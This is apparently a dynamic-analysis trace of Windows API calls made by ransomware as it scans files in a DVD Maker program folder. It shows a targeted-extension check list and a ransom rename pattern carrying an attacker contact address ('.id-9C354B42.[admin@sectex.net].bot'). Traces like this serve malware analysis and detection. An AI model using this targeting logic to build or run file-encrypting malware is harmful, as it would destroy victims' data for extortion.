	[0049.156] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0049.156] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51
	[0049.156] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51
	[0049.156] lstrlenW (lpString=".doc") returned 4
	[0049.156] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0049.156] lstrlenW (lpString=".docx") returned 5
	[0049.156] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1
	[0049.156] lstrlenW (lpString=".pdf") returned 4
	[0049.156] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0049.156] lstrlenW (lpString=".xls") returned 4
	[0049.156] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0049.156] lstrlenW (lpString=".xlsx") returned 5
	[0049.156] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1
	[0049.156] lstrlenW (lpString=".ppt") returned 4
	[0049.156] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0049.156] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51
	[0049.156] lstrlenW (lpString=".zip") returned 4
	[0049.156] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0049.156] lstrlenW (lpString=".rar") returned 4
	[0049.156] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0049.156] lstrlenW (lpString=".bz2") returned 4
	[0049.156] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0049.156] lstrlenW (lpString=".7z") returned 3
	[0049.156] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0049.156] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51
	[0049.156] lstrlenW (lpString=".dbf") returned 4
	[0049.156] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0049.157] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51
	[0049.157] lstrlenW (lpString=".1cd") returned 4
	[0049.157] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0049.157] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51
	[0049.157] lstrlenW (lpString=".jpg") returned 4
	[0049.157] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0049.157] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51
	[0049.157] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51
	[0049.157] lstrlenW (lpString=".doc") returned 4
	[0049.157] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0049.157] lstrlenW (lpString=".docx") returned 5
	[0049.157] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1
	[0049.157] lstrlenW (lpString=".pdf") returned 4
	[0049.157] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0049.157] lstrlenW (lpString=".xls") returned 4
	[0049.157] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0049.157] lstrlenW (lpString=".xlsx") returned 5
	[0049.157] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1
	[0049.157] lstrlenW (lpString=".ppt") returned 4
	[0049.157] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0049.157] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51
	[0049.157] lstrlenW (lpString=".zip") returned 4
	[0049.157] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0049.157] lstrlenW (lpString=".rar") returned 4
	[0049.157] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0049.157] lstrlenW (lpString=".bz2") returned 4
	[0049.157] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0049.157] lstrlenW (lpString=".7z") returned 3
	[0049.157] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0049.157] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51
	[0049.157] lstrlenW (lpString=".dbf") returned 4
	[0049.157] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0049.157] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51
	[0049.157] lstrlenW (lpString=".1cd") returned 4
	[0049.158] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0049.158] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51
	[0049.158] lstrlenW (lpString=".jpg") returned 4
	[0049.158] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0049.158] lstrcmpiW (lpString1=".png", lpString2=".bot") returned 1
	[0049.158] lstrlenW (lpString="16to9Squareframe_Buttongraphic.png") returned 34
	[0049.158] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0049.161] GetFileSizeEx (in: hFile=0x228, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=10123) returned 1
	[0049.161] CloseHandle (hObject=0x228) returned 1
	[0049.161] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png")) returned 0x20
	[0049.161] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0049.161] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0049.161] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78
	[0049.161] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78
	[0049.162] lstrlenW (lpString=".doc") returned 4
	[0049.162] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0049.162] lstrlenW (lpString=".docx") returned 5
	[0049.162] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1
	[0049.162] lstrlenW (lpString=".pdf") returned 4
	[0049.162] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0049.162] lstrlenW (lpString=".xls") returned 4
	[0049.162] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0049.162] lstrlenW (lpString=".xlsx") returned 5
	[0049.162] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1
	[0049.162] lstrlenW (lpString=".ppt") returned 4
	[0049.162] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0049.162] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78
	[0049.162] lstrlenW (lpString=".zip") returned 4
	[0049.162] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0049.162] lstrlenW (lpString=".rar") returned 4
	[0049.162] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0049.163] lstrlenW (lpString=".bz2") returned 4
	[0049.163] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0049.163] lstrlenW (lpString=".7z") returned 3
	[0049.163] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0049.163] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78
	[0049.163] lstrlenW (lpString=".dbf") returned 4
	[0049.163] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0049.163] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78
	[0049.163] lstrlenW (lpString=".1cd") returned 4
	[0049.163] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0049.163] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78
	[0049.163] lstrlenW (lpString=".jpg") returned 4
	[0049.163] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0049.163] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78
	[0049.163] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78
	[0049.163] lstrlenW (lpString=".doc") returned 4
	[0049.163] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0049.163] lstrlenW (lpString=".docx") returned 5
	[0049.163] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1
	[0049.163] lstrlenW (lpString=".pdf") returned 4
	[0049.163] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0049.163] lstrlenW (lpString=".xls") returned 4
	[0049.163] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0049.163] lstrlenW (lpString=".xlsx") returned 5
	[0049.163] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1
	[0049.163] lstrlenW (lpString=".ppt") returned 4
	[0049.163] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0049.163] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78
	[0049.163] lstrlenW (lpString=".zip") returned 4
	[0049.163] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0049.163] lstrlenW (lpString=".rar") returned 4
	[0049.163] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0049.163] lstrlenW (lpString=".bz2") returned 4
	[0049.163] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0049.164] lstrlenW (lpString=".7z") returned 3
	[0049.164] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0049.164] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78
	[0049.164] lstrlenW (lpString=".dbf") returned 4
	[0049.164] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0049.164] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78
	[0049.164] lstrlenW (lpString=".1cd") returned 4
	[0049.164] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0049.164] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78
	[0049.164] lstrlenW (lpString=".jpg") returned 4
	[0049.164] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0049.164] lstrcmpiW (lpString1=".png", lpString2=".bot") returned 1
	[0049.164] lstrlenW (lpString="16to9Squareframe_SelectionSubpicture.png") returned 40
	[0049.164] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0049.164] GetFileSizeEx (in: hFile=0x228, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=3286) returned 1
	[0049.164] CloseHandle (hObject=0x228) returned 1
	[0049.174] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png")) returned 0x20
	[0049.174] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0049.174] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0049.174] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84
	[0049.175] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84
	[0049.175] lstrlenW (lpString=".doc") returned 4
	[0049.175] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0049.175] lstrlenW (lpString=".docx") returned 5
	[0049.175] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1
	[0049.175] lstrlenW (lpString=".pdf") returned 4
	[0049.175] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0049.175] lstrlenW (lpString=".xls") returned 4
	[0049.175] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0049.175] lstrlenW (lpString=".xlsx") returned 5
	[0049.175] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1
	[0049.175] lstrlenW (lpString=".ppt") returned 4
	[0049.175] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0049.175] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84
	[0049.175] lstrlenW (lpString=".zip") returned 4
	[0049.175] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0049.175] lstrlenW (lpString=".rar") returned 4
	[0049.175] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0049.175] lstrlenW (lpString=".bz2") returned 4
	[0049.175] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0049.175] lstrlenW (lpString=".7z") returned 3
	[0049.175] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0049.175] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84
	[0049.175] lstrlenW (lpString=".dbf") returned 4
	[0049.175] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0049.175] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84
	[0049.175] lstrlenW (lpString=".1cd") returned 4
	[0049.175] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0049.175] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84
	[0049.175] lstrlenW (lpString=".jpg") returned 4
	[0049.175] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0049.175] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84
	[0049.175] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84
	[0049.175] lstrlenW (lpString=".doc") returned 4
	[0049.176] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0049.176] lstrlenW (lpString=".docx") returned 5
	[0049.176] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1
	[0049.176] lstrlenW (lpString=".pdf") returned 4
	[0049.176] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0049.176] lstrlenW (lpString=".xls") returned 4
	[0049.176] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0049.176] lstrlenW (lpString=".xlsx") returned 5
	[0049.176] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1
	[0049.176] lstrlenW (lpString=".ppt") returned 4
	[0049.176] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0049.176] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84
	[0049.176] lstrlenW (lpString=".zip") returned 4
	[0049.176] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0049.176] lstrlenW (lpString=".rar") returned 4
	[0049.176] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0049.176] lstrlenW (lpString=".bz2") returned 4
	[0049.176] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0049.176] lstrlenW (lpString=".7z") returned 3
	[0049.176] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0049.176] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84
	[0049.176] lstrlenW (lpString=".dbf") returned 4
	[0049.176] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0049.176] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84
	[0049.176] lstrlenW (lpString=".1cd") returned 4
	[0049.176] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0049.176] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84
	[0049.176] lstrlenW (lpString=".jpg") returned 4
	[0049.176] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0049.176] lstrcmpiW (lpString1=".png", lpString2=".bot") returned 1
	[0049.176] lstrlenW (lpString="16to9Squareframe_VideoInset.png") returned 31
	[0049.176] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_videoinset.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0049.177] GetFileSizeEx (in: hFile=0x228, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=3316) returned 1
	[0049.177] CloseHandle (hObject=0x228) returned 1
	[0049.177] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_videoinset.png")) returned 0x20
	[0049.178] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_videoinset.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0049.178] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0049.178] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned 75
	[0049.178] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned 75
	[0049.178] lstrlenW (lpString=".doc") returned 4
	[0049.178] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0049.178] lstrlenW (lpString=".docx") returned 5
	[0049.178] lstrcmpiW (lpString1=".docx", lpString2="t.png") returned -1
	[0049.178] lstrlenW (lpString=".pdf") returned 4
	[0049.178] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0049.178] lstrlenW (lpString=".xls") returned 4
	[0049.178] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0049.178] lstrlenW (lpString=".xlsx") returned 5
	[0049.178] lstrcmpiW (lpString1=".xlsx", lpString2="t.png") returned -1
	[0049.178] lstrlenW (lpString=".ppt") returned 4
	[0049.178] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0049.178] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned 75
	[0049.178] lstrlenW (lpString=".zip") returned 4
	[0049.178] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0049.178] lstrlenW (lpString=".rar") returned 4
	[0049.178] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0049.178] lstrlenW (lpString=".bz2") returned 4
	[0049.178] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0049.178] lstrlenW (lpString=".7z") returned 3
	[0049.178] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0049.178] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned 75
	[0049.178] lstrlenW (lpString=".dbf") returned 4
	[0049.179] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0049.179] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned 75
	[0049.179] lstrlenW (lpString=".1cd") returned 4
	[0049.179] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0049.179] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned 75
	[0049.179] lstrlenW (lpString=".jpg") returned 4
	[0049.179] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0049.179] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned 75
	[0049.179] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned 75
	[0049.179] lstrlenW (lpString=".doc") returned 4
	[0049.179] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0049.179] lstrlenW (lpString=".docx") returned 5
	[0049.179] lstrcmpiW (lpString1=".docx", lpString2="t.png") returned -1
	[0049.179] lstrlenW (lpString=".pdf") returned 4
	[0049.179] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0049.179] lstrlenW (lpString=".xls") returned 4
	[0049.179] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0049.179] lstrlenW (lpString=".xlsx") returned 5
	[0049.179] lstrcmpiW (lpString1=".xlsx", lpString2="t.png") returned -1
	[0049.179] lstrlenW (lpString=".ppt") returned 4
	[0049.179] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0049.179] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned 75
	[0049.179] lstrlenW (lpString=".zip") returned 4
	[0049.179] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0049.179] lstrlenW (lpString=".rar") returned 4
	[0049.179] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0049.179] lstrlenW (lpString=".bz2") returned 4
	[0049.179] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0049.179] lstrlenW (lpString=".7z") returned 3
	[0049.179] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0049.179] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned 75
	[0049.179] lstrlenW (lpString=".dbf") returned 4
	[0049.179] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0049.179] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned 75
	[0049.179] lstrlenW (lpString=".1cd") returned 4
	[0049.180] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0049.180] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned 75
	[0049.180] lstrlenW (lpString=".jpg") returned 4
	[0049.180] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0049.180] lstrcmpiW (lpString1=".png", lpString2=".bot") returned 1
	[0049.180] lstrlenW (lpString="4to3Squareframe_Buttongraphic.png") returned 33
	[0049.180] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0049.180] GetFileSizeEx (in: hFile=0x228, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=11861) returned 1
	[0049.180] CloseHandle (hObject=0x228) returned 1
	[0049.180] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png")) returned 0x20
	[0049.180] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0049.180] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0049.181] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png") returned 77
	[0049.181] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png") returned 77
	[0049.181] lstrlenW (lpString=".doc") returned 4
	[0049.181] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0049.181] lstrlenW (lpString=".docx") returned 5
	[0049.181] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1
	[0049.181] lstrlenW (lpString=".pdf") returned 4
	[0049.181] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0049.181] lstrlenW (lpString=".xls") returned 4
	[0049.181] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0049.181] lstrlenW (lpString=".xlsx") returned 5
	[0049.181] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1
	[0049.181] lstrlenW (lpString=".ppt") returned 4
	[0049.181] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0049.181] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png") returned 77
	[0049.181] lstrlenW (lpString=".zip") returned 4
	[0049.181] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0049.181] lstrlenW (lpString=".rar") returned 4
	[0049.181] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0049.181] lstrlenW (lpString=".bz2") returned 4
	[0049.181] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0049.181] lstrlenW (lpString=".7z") returned 3
	[0049.181] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0049.181] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png") returned 77
